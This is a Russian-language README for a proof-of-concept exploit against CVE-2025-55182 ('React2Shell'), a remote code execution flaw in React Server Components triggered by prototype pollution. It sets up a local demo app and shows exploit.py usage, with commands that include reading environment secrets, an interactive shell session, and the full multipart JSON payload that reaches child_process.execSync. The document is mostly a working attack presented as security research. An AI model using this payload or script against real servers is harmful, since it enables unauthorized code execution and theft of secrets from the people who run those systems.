Эксплойт для подтверждения концепции для CVE-2025-55182 (React2Shell), критической уязвимости RCE в React Server Components через загрязнение прототипа. Включает интерактивный режим и режим командной строки.
Практическая демонстрация CVE-2025-55182 (React2Shell) — критической уязвимости удаленного выполнения кода в React Server Components.
React Server Components десериализуют FormData небезопасным образом. Специально сформированные multipart-поля вызывают загрязнение прототипа и выполняют произвольный код через child_process.execSync.
npm install
pip3 install requests
npm run dev
Приложение запускается по адресу: http://localhost:3000
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
python3 exploit.py -i
> whoami
РЕЗУЛЬТАТ КОМАНДЫ:
your-username
============================================================
> pwd
РЕЗУЛЬТАТ КОМАНДЫ:
/path/to/project
============================================================
> exit
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
npm run dev
python3 exploit.py -c "whoami"
python3 exploit.py -c "whoami" -v
Показывает полную структуру полезной нагрузки и ответ сервера
Автор: Guaxinim | Исследования кибербезопасности